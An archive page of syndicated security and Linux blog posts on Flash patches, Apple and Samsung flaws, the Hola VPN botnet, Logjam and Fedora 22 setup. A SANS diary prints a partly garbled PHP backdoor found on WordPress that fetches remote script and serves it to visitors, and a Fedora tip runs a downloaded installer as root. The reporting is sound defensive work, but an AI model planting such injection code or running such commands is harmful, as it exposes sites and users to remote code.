Posts tagged ‘chrome’

Krebs on Security: Emergency Patch for Adobe Flash Zero-Day

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe Systems Inc. today released an emergency update to fix a dangerous security hole in its widely-installed Flash Player browser plugin. The company warned that the vulnerability is already being exploited in targeted attacks, and urged users to update the program as quickly as possible.

In an advisory issued Tuesday morning, Adobe said the latest version of Flash — v. on Windows and Mac OS X — fixes a critical flaw (CVE-2015-3113) that is being actively exploited in “limited, targeted attacks.” The company said systems running Internet Explorer for Windows 7 and below, as well as Firefox on Windows XP, are known targets of these exploits.

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update on Chrome, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.)

In lieu of patching Flash Player yet again, it might be worth considering whether you really need to keep Flash Player installed at all. In a happy coincidence, earlier today I published a piece about my experience going a month without having Flash Player installed. The result? I hardly missed it at all.

Krebs on Security: A Month Without Adobe Flash Player

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

I’ve spent the better part of the last month running a little experiment to see how much I would miss Adobe‘s buggy and insecure Flash Player software if I removed it from my systems altogether. Turns out, not so much.

brokenflash-aBrowser plugins are favorite targets for malware and miscreants because they are generally full of unpatched or undocumented security holes that cybercrooks can use to seize complete control over vulnerable systems. The Flash Player plugin is a stellar example of this: It is among the most widely used browser plugins, and it requires monthly patching (if not more frequently).

It’s also not uncommon for Adobe to release emergency fixes for the software to patch flaws that bad guys started exploiting before Adobe even knew about the bugs. This happened most recently in February 2015, and twice the month prior. Adobe also shipped out-of-band Flash fixes in December and November 2014.

Time was, Oracle’s Java plugin was the favorite target of exploit kits, software tools made to be stitched into hacked or malicious sites and foist on visiting browsers a kitchen sink of exploits for various plugin vulnerabilities. Lately, however, it seems to pendulum has swung back in favor of exploits for Flash Player. A popular exploit kit known as Angler, for example, bundled a new exploit for a Flash vulnerability just three days after Adobe fixed it in April 2015.

So, rather than continue the patch madness and keep this insecure software installed, I decided to the pull the…er…plugin. I tend to (ab)use different browsers for different tasks, and so uninstalling the plugin was almost as simple as uninstalling Flash, except with Chrome, which bundles its own version of Flash Player. Fear not: disabling Flash in Chrome is simple enough. On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome:plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing: To disable Flash, click the disable link (to re-enable it, click “enable”).

In almost 30 days, I only ran into just two instances where I encountered a site hosting a video that I absolutely needed to watch and that required Flash (an instructional video for a home gym that I could find nowhere else, and a live-streamed legislative hearing). For these, I opted to cheat and load the content into a Flash-enabled browser inside of a Linux virtual machine I have running inside of VirtualBox. In hindsight, it probably would have been easier simply to temporarily re-enable Flash in Chrome, and then disable it again until the need arose.

If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like Noscript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.

Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).

Windows users who decide to keep Flash installed and/or enabled also should take full advantage of the Enhanced Mitigation Experience Toolkit (EMET), a free tool from Microsoft that can help Windows users beef up the security of third-party applications.

Krebs on Security: Critical Flaws in Apple, Samsung Devices

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Normally, I don’t cover vulnerabilities about which the user can do little or nothing to prevent, but two newly detailed flaws affecting hundreds of millions of Android, iOS and Apple products probably deserve special exceptions.

keychainThe first is a zero-day bug in iOS and OS X that allows the theft of both Keychain (Apple’s password management system) and app passwords. The flaw, first revealed in an academic paper (PDF) released by researchers from Indiana University, Peking University and the Georgia Institute of Technology, involves a vulnerability in Apple’s latest operating system versions that enable an app approved for download by the Apple Store to gain unauthorized access to other apps’ sensitive data.

“More specifically, we found that the inter-app interaction services, including the keychain…can be exploited…to steal such confidential information as the passwords for iCloud, email and bank, and the secret token of Evernote,” the researchers wrote.

The team said they tested their findings by circumventing the restrictive security checks of the Apple Store, and that their attack apps were approved by the App Store in January 2015. According to the researchers, more than 88 percent of apps were “completely exposed” to the attack.

News of the research was first reported by The Register, which reported that Apple was first notified in October 2014 and that in February 2015 the company asked researchers to hold off disclosure for six months.

“The team was able to raid banking credentials from Google Chrome on the latest Mac OS X 10.10.3, using a sandboxed app to steal the system’s keychain and secret iCloud tokens, and passwords from password vaults,” The Register wrote. “Google’s Chromium security team was more responsive and removed Keychain integration for Chrome noting that it could likely not be solved at the application level. AgileBits, owner of popular software 1Password, said it could not find a way to ward off the attacks or make the malware ‘work harder’ some four months after disclosure.”

A story at suggests the malware the researchers created to run their experiments can’t directly access existing keychain entries, but instead does so indirectly by forcing users to log in manually and then capturing those credentials in a newly-created entry.

“For now, the best advice would appear to be cautious in downloading apps from unknown developers – even from the iOS and Mac App Stores – and to be alert to any occasion where you are asked to login manually when that login is usually done by Keychain,” 9to5’s Ben Lovejoy writes.


Separately, researchers at mobile security firm NowSecure disclosed they’d found a serious vulnerability in a third-party keyboard app that is pre-installed on more than 600 million Samsung mobile devices — including the recently released Galaxy S6 — that allows attackers to remotely access resources like GPS, camera and microphone, secretly install malicious apps, eavesdrop on incoming/outgoing messages or voice calls, and access pictures and text messages on vulnerable devices.

The vulnerability in this case resides with an app called Swift keyboard, which according to researcher Ryan Welton runs from a privilege account on Samsung devices. The flaw can be exploited if the attacker can control or compromise the network to which the device is connected, such as a wireless hotspot or local network.

“This means that the keyboard was signed with Samsung’s private signing key and runs in one of the most privileged contexts on the device, system user, which is a notch short of being root,” Welton wrote in a blog post about the flaw, which was first disclosed at Black Hat London on Tuesday, along the release of proof-of-concept code.

Welton said NowSecure alerted Samsung in November 2014, and that at the end of March Samsung reported a patch released to mobile carriers for Android 4.2 and newer, but requested an additional three months deferral for public disclosure. Google’s Android security team was alerted in December 2014.

“While Samsung began providing a patch to mobile network operators in early 2015, it is unknown if the carriers have provided the patch to the devices on their network,” Welton said. “In addition, it is difficult to determine how many mobile device users remain vulnerable, given the devices models and number of network operators globally.” NowSecure has released a list of Samsung devices indexed by carrier and their individual patch status.

Samsung issued a statement saying it takes emerging security threats very seriously.

“Samsung KNOX has the capability to update the security policy of the phones, over-the-air, to invalidate any potential vulnerabilities caused by this issue. The security policy updates will begin rolling out in a few days,” the company said. “In addition to the security policy update, we are also working with SwiftKey to address potential risks going forward.”

A spokesperson for Google said the company took steps to mitigate the issue with the release of Android 5.0 in November 2014.

“Although these are most accurately characterized as application level issues, back with Android 5.0, we took proactive measures to reduce the risk of the issues being exploited,” Google said in a statement emailed to KrebsOnSecurity. “For the longer term, we are also in the process of reaching out to developers to ensure they follow best practices for secure application development.”

SwiftKey released a statement emphasizing that the company only became aware of the problem this week, and that it does not affect its keyboard applications available on Google Play or Apple App Store. “We are doing everything we can to support our long-time partner Samsung in their efforts to resolve this important security issue,” SwiftKey said in a blog post.

The Hacker Factor Blog: Late Night Programming

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’ve been spending my evenings working on various tweaks and possible enhancements to the FotoForensics site. Some of these experiments have worked out really well, some have a few problems, and some are still in the “learning curve” phase.


One of my fun projects is related to the trend detector. I am using vis.js to display relationships that represent various types of trends. This results in very cool association graphs!

This snapshot shows related clusters that formed after three days. The actual graph is interactive. I can click on any node to identify more information about it. I like the way it displays and it really helps identify various clusters of related data. However, this tool really isn’t practical for a public release because of two big problems.

The first problem is speed. If there are only a few nodes, then it renders very quickly. A few hundred makes it pause before displaying as it initially stabilizes the graph. But a few thousand? Start it up and go to lunch… it should be done when you get back. While vis.js does a great job at visualizing the data, this JavaScript library really isn’t fast enough for my data set. Ideally, I want to generate this kind of association graph with 10,000 nodes or more, but the browser really can’t handle it. (Vis.js has an option to group clusters until you zoom in, but that loses the global visual representation.)

The second problem is specifically a browser issue. The vis.js library uses a canvas element for rendering. On my old Chrome 21.x browser, it renders great! Fast and easy to use. However, the default Chromium for Ubuntu 14.04 (Chromium 5) won’t render anything — you just see a black background and it complains about a JavaScript error in vis.js (but there is no error). Chrome 43 for Windows and Firefox 37 for Ubuntu both have memory leaks related to the canvas tag. They will render the first graph without a problem. If you reload the page and open another graph, then it becomes slow. A third reload makes it horribly slow. And by the 4th or 5th reload, the browser hangs. Even closing the tab (but not the browser) between reloads is not enough to resolve this issue.

I’m not the only person to notice this memory leak. It seems to impact newer versions of Firefox, Chrome, and Chromium, dating back more than a year. (Examples: #1, #2, #3.) I suspect that Safari and other WebKit browsers may have the same problem.

And before someone asks… Yes, I tried the latest-greatest versions of Chrome and Firefox. Both crash on Ubuntu 14.04 before they can load any pages. (These are unstable browser ports.) On Windows, they still have the memory leak. For right now, I’m only using this vis.js code on an old Chrome browser that predates the memory leak. Ideally I’d like an interactive web-based solution that can handle 10,000 nodes, but that doesn’t seem likely in the near future.


I’ve been spending some time trying to wrap my head around WebRTC. That’s the interactive web technology that permits video and audio sharing. My long-term goal is to configure a WebRTC server for FotoForensics, where I can share my browser window and conduct online training sessions for specific clients, research partners, and occasional guests. (This isn’t intended for the public FotoForensics server. This is more for the private servers that have more features and really requires training sessions.)

I’ve finally wrapped my head around the WebRTC, STUN, and TURN relationships that are required for enabling this technology. There are dozens of web pages with overviews and tutorials, but none of them are very good or detailed. And I still need to figure out how to do things like encryption. (Some docs say that the traffic is automagically encrypted, but I cannot find details about how this works.)

Installing, configuring, and deploying is another complex issue. While there are a few ready-to-go installation packages, I haven’t found them easy to customize. For example, I have my own login management system but I cannot figure out how to integrate it. I want to make sure users cannot create their own private chat rooms, but most code enables arbitrary room allocations. And I want to share either an app (browser) or a desktop and not a video camera, but I cannot figure out how to do that. In some cases, I may just want to share audio without video, or audio with a text-chat window. In other cases, I want users to be able to share their desktops with me so that I can help diagnose content. But I haven’t figured out how to do any of these either.

I have also played with external systems, like Google Hangouts, GoToMeeting, and WebEx. I like the speed, I like the flow, and I like the features like a text-based chat window and Hangout’s live annotations. But I don’t like the idea of sending anything related to my technologies through a third party; all communications should go direct from my server and my desktop computer to the other member’s computers. I want no dependencies on any external third-party services. Also, anything that requires installing special software as a plugin or an app is a show-stopper. I need to support a lot of different platforms, and requiring every user to install a plugin or app is not a platform independent solution.


Outside of the graphical arena, I’ve been looking more at the various users who attack my site or violate the terms of service. If I can identify trends, then I can address them and cut down on abuses.

Recently I noticed that some of these abusers are using cloud service providers. So, I decided to map out which services they use. I really expected them to be evenly distributed across the various cloud solutions, but that is definitely not the case.

Some of the biggest cloud providers, like CloudFlare, Rackspace, Softlayer, and Microsoft’s Azure, do not show up at all in my lists of abusive sources. I assume that this means that they are very good at policing their users. (Either that, or these services are too expensive for the riff raff.) The cloud services offered by Google and Amazon do not have many violators, but nearly all of their violators are associated with hostile network attacks. These are systems that are explicitly trying to compromise other online computers. And in the case of Google, they have a few hostile accounts that have been going at it for at least a few months. Either these cloud services have not noticed that their users are hostile, or do not care about stopping outbound attacks.

In contrast to Google and Amazon, Versaweb, GTT/nLayer, and a few others are mostly associated with proxies that are used to violate my terms of service. (I.e., porn uploaders.) This makes it really easy to identify and I can flag their content as potential violations. I should have a new autoban rule implemented in the near future.

More Changes

I’m still trying to finish up and deploy a few other technologies. Some of these will better protect my site, while others will make the site more convenient for users and analysts. Whenever I deploy an improvement to the site, I end up learning something new, and that may lead to additional fun research topics. I am definitely looking forward to these behind-the-scenes updates and whatever surprises they may bring.

Krebs on Security: Adobe, Microsoft Issue Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe today released software updates to plug at least 13 security holes in its Flash Player software. Separately, Microsoft pushed out fixes for at least three dozen flaws in Windows and associated software.

brokenwindowsThe bulk of the flaws Microsoft addressed today (23 of them) reside in the Internet Explorer Web browser. Microsoft also issued fixes for serious problems in Office, the Windows OS itself and Windows Media Player, among other components. A link to an index of the individual Microsoft updates released today is here.

As it normally does on Patch Tuesday, Adobe issued fixes for its Flash and AIR software, plugging a slew of dangerous flaws in both products. Flash continues to be one of the more complex programs to manage and update on a computer, mainly because its auto-update function tends to lag the actual patches by several days at least (your mileage may vary), and it’s difficult to know which version is the latest.

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Users of the Adobe Flash Player Desktop Runtime for Windows and Macintosh should update to Adobe Flash Player Adobe Flash Player installed with Google Chrome, as well as Internet Explorer onWindows 8.x, should automatically update to version, although Chrome users on Mac systems will find is actually the latest version, according to Adobe. To force the installation of an available update, click the triple bar icon to the right of the address bar, select “About Google” Chrome, click the apply update button and restart the browser.


The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). See this graphic for the full Adobe version release.

Most applications bundled with Adobe AIR should check for updates on startup. If prompted, please download and install the AIR update. If you need to update manually, grab the latest version here.

As usual, please sound off in the comments section if you experience any issues applying any of these patches.

TorrentFreak: Hola VPN Already Exploited By “Bad Guys”, Security Firm Says

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

After a flurry of reports, last week the people behind geo-unblocking software Hola were forced to concede that their users’ bandwidth is being sold elsewhere for commercial purposes. But for the Israel-based company, that was the tip of the iceberg.

Following an initial unproofed report that the software operates as a botnet, this weekend researchers published an advisory confirming serious problems with the tool.

“The Hola Unblocker Windows client, Firefox addon, Chrome extension and Android application contain multiple vulnerabilities which allow a remote or local attacker to gain code execution and potentially escalate privileges on a user’s system,” the advisory reads.

Yesterday and after several days of intense pressure, Hola published a response in which it quoted Steve Jobs and admitted that mistakes had been made. Hola said that it would now be making it “completely clear” to its users that their resources are being used elsewhere in exchange for a free product.

Hola also confirmed that two vulnerabilities found by the researchers at Adios-Hola had now been fixed, but the researchers quickly fired back.

“We know this to be false,” they wrote in an update. “The vulnerabilities are *still* there, they just broke our vulnerability checker and exploit demonstration. Not only that; there weren’t two vulnerabilities, there were six.”

With Hola saying it now intends to put things right (it says it has committed to an external audit with “one of the big 4 auditing companies”) the company stood by its claims that its software does not turn users’ computers into a botnet. Today, however, an analysis by cybersecurity firm Vectra is painting Hola in an even more unfavorable light.

In its report Vectra not only insists that Hola behaves like a botnet, but it’s possible it has malicious features by design.

“While analyzing Hola, Vectra Threat Labs researchers found that in addition to behaving like a botnet, Hola contains a variety of capabilities that almost appear to be designed to enable a targeted, human-driven cyber attack on the network in which an Hola user’s machine resides,” the company writes.

“First, the Hola software can download and install any additional software without the user’s knowledge. This is because in addition to being signed with a valid code-signing certificate, once Hola has been installed, the software installs its own code-signing certificate on the user’s system.”

If the implications of that aren’t entirely clear, Vectra assists on that front too. On Windows machines, the certificate is added to the Trusted Publishers Certificate Store which allows *any code* to be installed and run with no notification given to the user. That is frightening.

Furthermore, Vectra found that Hola contains a built-in console (“zconsole”) that is not only constantly active but also has powerful functions including the ability to kill running processes, download a file and run it whilst bypassing anti-virus software, plus read and write content to any IP address or device.

“These capabilities enable a competent attacker to accomplish almost anything. This shifts the discussion away from a leaky and unscrupulous anonymity network, and instead forces us to acknowledge the possibility that an attacker could easily use Hola as a platform to launch a targeted attack within any network containing the Hola software,” Vectra says.

Finally, Vectra says that while analyzing the protocol used by Hola, its researchers found five different malware samples on VirusTotal that contain the Hola protocol. Worryingly, they existed before the recent bad press.

“Unsurprisingly, this means that bad guys had realized the potential of Hola before the recent flurry of public reports by the good guys,” the company adds.

For now, Hola is making a big show of the updates being made to its FAQ as part of its efforts to be more transparent. However, items in the FAQ are still phrased in a manner that portrays criticized elements of the service as positive features, something that is likely to mislead non-tech oriented users.

“Since [Hola] uses real peers to route your traffic and not proxy servers, it makes you more anonymous and more secure than regular VPN services,” one item reads.

How Hola will respond to Vectra’s latest analysis remains to be seen, but at this point there appears little that the company can say or do to pacify much of the hardcore tech community. That being said, if Joe Public still can’t see the harm in a free “community” VPN operating a commercial division with full access to his computer, Hola might settle for that.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Linux How-Tos and Linux Tutorials: 11 Things to do After Installing Fedora 22

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials

Fedora 22 is certainly an exciting release for the hard core Fedora fans. And it has more than enough glitter to attract a potential new user.

One of the most notable improvements includes the arrival of DNF which replaces the aging Yum. In my own experience DNF is faster and more memory efficient than Yum. It looks like we have an answer to apt-get in Fedora land.

Since Fedora is primarily a Gnome distro, you will notice the brand new and shiny Gnome 3.16. There are massive improvements in Gnome 3.16 including the brand new notification system, the improved Nautilus (Files) and image viewer which removes all the chrome to focus on the image itself.

One of the most exciting tools in Fedora is the introduction of Vagrant which helps developers in getting started with virtualized environments quickly and easily.

As usual it’s a polished release of the distro with a lot of news features which we will cover in a detailed review next week.

Every operating system whether it be Mac OS X, Windows or Fedora needs some work to customize to serve its user. However, unlike its proprietary counterparts, Fedora comes with quite a lot of software pre-installed so you won’t have to do that much work.

Here are some of the things that I do after installing Fedora on a system. None of it is mandatory and most of it is targeted to an average user. You will be able to use Fedora without doing any of it, but these tips can help improve your experience with the distro. So without further ado let’s get started.

Update your system

First of all we need to update the system. A lot of packages have received updates in the time between this latest update and when you installed Fedora on your system. To ensure your system is safe and secure you must keep your system up-to-date. With Fedora 22, ‘yum’ is on its way out and ‘dnf’ is replacing it, so we will be using ‘dnf’ instead of ‘yum’ to perform many tasks.

To install updates on your system run the following command:

sudo dnf update

Install extra repositories

As it’s widely known, many Linux distributions can’t ship a variety of packages through official repositories due to licences and patents. On a Fedora system you can get access to such packages by installing RPM Fusion repository.

You have to install two repositories – Free and Non-free. It’s extremely simple to add these repositories to your system; just open the RPM Fusion website. There you will find links for different versions of Fedora. Click on the link for your version of Fedora and it will install that repo on your system through the ‘Software’ app. It’s recommended to first install the ‘Free’ repo and then the ‘Non-Free’ one.

fedora rpmfusion

Once these two repos are installed we now have access to many more applications.

Install VLC Media Player

VLC is the the swiss knife of media players. It can play virtually every media format out there. Since the RPMFusion repos are already installed you can install VLC using ‘dnf':

sudo dnf install vlc

Install Clementine

As much as I like Gnome, the default desktop environment of Fedora, I am not a huge fan of the painfully simple Rhythmbox. I always install the ‘Clementine’ music player which not only has a nicer interface, but also comes with more features. You can install Clementine by running:

sudo dnf install clementine

Install MP3 codecs

Fedora’s focus on FOSS-only software packages does make it more challenging to get stuff like mp3 files to work. I used to install gstreamer plugins for mp3 support, but I faced some problems in Fedora 22. So I resorted to another nifty tool called Fedy. Since Fedy does more than installing codecs, I will talk about it separately.

Get Fedy, before you get fed-up

Fedy is a ‘jack of all trades’ kind of tool. Install Fedy using the following command:

$ su -c "curl -o fedy-installer && chmod +x fedy-installer && ./fedy-installer"

Once installed, you will see there are broadly two kinds of tasks you can perform using Fedy: install new packages and tweak the system. Under the ‘Apps’ tab you will find the option to install ‘multimedia codecs’ which will also bring ‘mp3′ support to your system.

Just scroll through it and see what else you want to install. Two of my favorite packages, in addition to codecs, are Microsoft fonts (for better font rendering) and Sublime Text.

fedora fedy

There are chances that a font may look ugly in Fedora. This problem isn’t unique to Fedora; I have the same issue with Arch Linux, openSUSE or Kubuntu as well. I spend a considerate amount of time fixing fonts on these systems. Fedy has made it extremely easy to make fonts look good under Fedora with just one click. Under ‘Tweaks’ one of the most important options is ‘font rendering’, which will fix font issues on your system.

Install Gnome Tweak Tool

Gnome is the default desktop environment of Fedora and the overall Gnome experience heavily rely on extensions. And Gnome Tweak Tool is an important tool go get a pristine Gnome experience. It’s surprising to see that Tweak Tool doesn’t come pre-installed on Fedora. Comparatively openSUSE does a better job by pre-installing Tweak Tool and some useful extensions. You can install Tweak Tool in Fedora by running this command:

sudo dnf install gnome-tweak-tool

Once the tool is installed, you can manage your extensions from there. I wish the tool was able to search and install new extensions too. Currently you have to visit the Gnome Extensions site to install new extensions. Once the extension is installed, you can enable it, configure it and disable it from the Tweak Tool.

Since I have a multi-monitor set-up I grab the extension for Multiple Monitors. I also recommend ‘Dash to Dock’ which allows a user to configure the Dash. You can disable Dash from ‘autohiding’, you can change the icon size, you can even choose the location of the dash. Last, but not least, you can also extend the dash to the length of the screen just like the one in Unity. For the users of multiple monitors, there is a nifty option to show the dash on the desired monitor. It’s a must-have extension.

Install Chrome to watch Netflix

Fedora tends to offer the vanilla Gnome experience, but instead of Web, the default web browser of Gnome, it comes with Firefox. However Firefox sill doesn’t support DRMed content on Linux so you can’t watch Netflix. That’s where Google Chrome comes in handy. You can install Chrome by either downloading it from the Google site or from Fedy.

Download and install Chrome from the official site.

Cloud in your hands

If you are running your own private cloud — and you must in order to safeguard any sensitive data — you can grab the clients for Seafile or ownCloud for your system. But if you use Google Drive or Dropbox you can also use them easily on Fedora.

There are official clients for all commercial cloud services including Dropbox, with Google Drive being an exception. One of the easiest ways to get Google Drive on Linux is inSync; while it does have more features than the Google Drive client, it costs money to use. You can install inSync by downloading the official client from their website. Once installed, connect it to your Google account, point it to the location where you want your files to be saved, and you are good to take Google for a drive.

Online accounts

Despite being a Plasma user I envy the Online Accounts feature of Gnome. It makes it extremely easy to configure communication tools such as email, calendars, address book and IM.

Gnome’s Online Accounts supports more than half a dozen services including Google, Facebook, Flickr, ownCloud, etc. Open Online Accounts from the Dash and choose the service you want to configure. Once you are connected to an account, you can choose what kind of service you want to enable for that account. In case of Google, for example, I enabled all these services.

fedora online accounts

The beauty is that when I open Evolution, the default email client in Fedora, it’s already configured with that email account.

Getting non-free drivers for GPU

It’s really hard to get non-free software to work with Fedora. I use Arch Linux and I find it much easier to install Nvidia drivers on Arch than it is on Fedora. The fact is you will not need non-free drivers under Fedora as your graphics card will work out-of-the-box. However if you do need them (why would you buy an expensive Nvidia card if you can’t take full advantage of it?) then you have to do some hard work. I broke my previous Fedora installs due to non-free drivers so gave up on them. If you want to install such drivers on the Fedora box I would suggest this RPMFusion page. My free advice to you would be, don’t try it at home.

Getting your printer to work in Fedora

It’s a non-issue nowadays, depending on the make of your printer. In most cases when you run the Printer’s tool, Fedora will detect and configure your printer with one click.

That’s most of what I do on my Fedora system. A few things, mostly related to non-free software, do look more complicated under Fedora. That’s mainly due to Fedora’s policy to use and promote FOSS. Once you cross that river Fedora is a pleasant OS to use.

Now tell us what things you do after installing Fedora on your system.

TorrentFreak: Hola VPN Sells Users’ Bandwidth, Founder Confirms

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

hola-logoFaced with increasing local website censorship and Internet services that restrict access depending on where a user is based, more and more people are turning to specialist services designed to overcome such limitations.

With prices plummeting to just a few dollars a month in recent years, VPNs are now within the budgets of most people. However, there are always those who prefer to get such services for free, without giving much consideration to how that might be economically viable.

One of the most popular free VPN/geo-unblocking solutions on the planet is operated by Israel-based Hola. It can be added to most popular browsers in seconds and has an impressive seven million users on Chrome alone. Overall the company boasts 46 million users of its service.

Now, however, the company is facing accusations from 8chan message board operator Fredrick Brennan. He claims that Hola users’ computers were used to attack his website without their knowledge, and that was made possible by the way Hola is setup.

“When a user installs Hola, he becomes a VPN endpoint, and other users of the Hola network may exit through his internet connection and take on his IP. This is what makes it free: Hola does not pay for the bandwidth that its VPN uses at all, and there is no user opt out for this,” Brennan says.

This means that rather than having their IP addresses cloaked behind a private server, free Hola users are regularly exposing their IP addresses to the world but associated with other people’s traffic – no matter what that might contain.


While this will come as a surprise to many, Hola says it has never tried to hide the methods it employs to offer a free service.

Speaking with TorrentFreak, Hola founder Ofer Vilenski says that his company offers two tiers of service – the free option (which sees traffic routed between Hola users) and a premium service, which operates like a traditional VPN.

However, Brennan says that Hola goes a step further, by selling Hola users’ bandwidth to another company.

“Hola has gotten greedy. They recently (late 2014) realized that they basically have a 9 million IP strong botnet on their hands, and they began selling access to this botnet (right now, for HTTP requests only) at,” the 8chan owner says.

TorrentFreak asked Vilenski about Brennan’s claims. Again, there was no denial.

“We have always made it clear that Hola is built for the user and with the user in mind. We’ve explained the technical aspects of it in our FAQ and have always advertised in our FAQ the ability to pay for non-commercial use,” Vilenski says.

And this is how it works.

Hola generates revenue by selling a premium service to customers through its Luminati brand. The resources and bandwidth for the Luminati product are provided by Hola users’ computers when they are sitting idle. In basic terms, Hola users get their service for free as long as they’re prepared to let Hola hand their resources to Luminati for resale. Any users who don’t want this to happen can buy Hola for $5 per month.

Fair enough perhaps – but how does Luminati feature in Brennan’s problems? It appears his interest in the service was piqued after 8chan was hit by multiple denial of service attacks this week which originated from the Luminati / Hola network.

“An attacker used the Luminati network to send thousands of legitimate-looking POST requests to 8chan’s post.php in 30 seconds, representing a 100x spike over peak traffic and crashing PHP-FPM,” Brennan says.

Again, TorrentFreak asked Vilenski for his input. Again, there was no denial.

“8chan was hit with an attack from a hacker with the handle of BUI. This person then wrote about how he used the Luminati commercial VPN network to hack 8chan. He could have used any commercial VPN network, but chose to do so with ours,” Vilenski explains.

“If 8chan was harmed, then a reasonable course of action would be to obtain a court order for information and we can release the contact information of this user so that they can further pursue the damages with him.”

Vilenski says that Hola screens users of its “commercial network” (Luminati) prior to them being allowed to use it but in this case “BUI” slipped through the net. “Adjustments” have been made, Hola’s founder says.

“We have communicated directly with the founder of 8Chan to make sure that once we terminated BUI’s account they’ve had no further problems, and it seems that this is the case,” Vilenski says.

It is likely the majority of Hola’s users have no idea how the company’s business model operates, even though it is made fairly clear in its extensive FAQ/ToS. Installing a browser extension takes seconds and if it works as advertised, most people will be happy.

Whether this episode will affect Hola’s business moving forward is open to question but for those with a few dollars to spend there are plenty of options in the market. Until then, however, those looking for free options should read the small print before clicking install.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Possible WordPress Botnet C&C:, (Tue, May 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Thanks to one of our readers, for sending us this snipped of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):

#2b8008# ">">/* turn off error reporting */
@ini_set(display_errors ">/* do not display errors to the user */
$wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT">/* only run the code if this is Chrome or IE and not a bot */

if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610)))
{ ">
# Assemble a URL like[client ip]referer=[server host name]ua=[user agent]

$wp_mezd098610= ip=.$_SERVER[REMOTE_ADDR].referer=.urlencode($_SERVER[HTTP_HOST]).ua="># check if we have the curl extension installed

if (function_exists(curl_init) function_exists(curl_exec"># if we dont have curl, try file_get_contents which requires allow_url_fopen.

elseif (function_exists(file_get_contents) @ini_get(allow_url_fopen"># or try fopen as a last resort
elseif (function_exists(fopen) function_exists(stream_get_contents)) {$wp_8610mezd=@stream_get_contents(@fopen($wp_mezd098610, r}}

if (substr($wp_8610mezd,1,3) === scr"># The data retrieved will be echoed back to the user if it starts with the string scr.

I havent been able to retrieve any content from Has anybody else seen this code, or is able to retrieve content from ?

According to whois, is owned by a Chinese organization. It currently resolves to37.1.207.26, which is owned by a british ISP. Any help as to the nature of this snippet willbe appreciated.

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Schneier on Security: The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Logjam is a new attack against the Diffie-Hellman key-exchange protocol used in TLS. Basically:

The Logjam attack allows a man-in-the-middle attacker to downgrade vulnerable TLS connections to 512-bit export-grade cryptography. This allows the attacker to read and modify any data passed over the connection. The attack is reminiscent of the FREAK attack, but is due to a flaw in the TLS protocol rather than an implementation vulnerability, and attacks a Diffie-Hellman key exchange rather than an RSA key exchange. The attack affects any server that supports DHE_EXPORT ciphers, and affects all modern web browsers. 8.4% of the Top 1 Million domains were initially vulnerable.

Here’s the academic paper.

One of the problems with patching the vulnerability is that it breaks things:

On the plus side, the vulnerability has largely been patched thanks to consultation with tech companies like Google, and updates are available now or coming soon for Chrome, Firefox and other browsers. The bad news is that the fix rendered many sites unreachable, including the main website at the University of Michigan, which is home to many of the researchers that found the security hole.

This is a common problem with version downgrade attacks; patching them makes you incompatible with anyone who hasn’t patched. And it’s the vulnerability the media is focusing on.

Much more interesting is the other vulnerability that the researchers found:

Millions of HTTPS, SSH, and VPN servers all use the same prime numbers for Diffie-Hellman key exchange. Practitioners believed this was safe as long as new key exchange messages were generated for every connection. However, the first step in the number field sieve — the most efficient algorithm for breaking a Diffie-Hellman connection — is dependent only on this prime. After this first step, an attacker can quickly break individual connections.

The researchers believe the NSA has been using this attack:

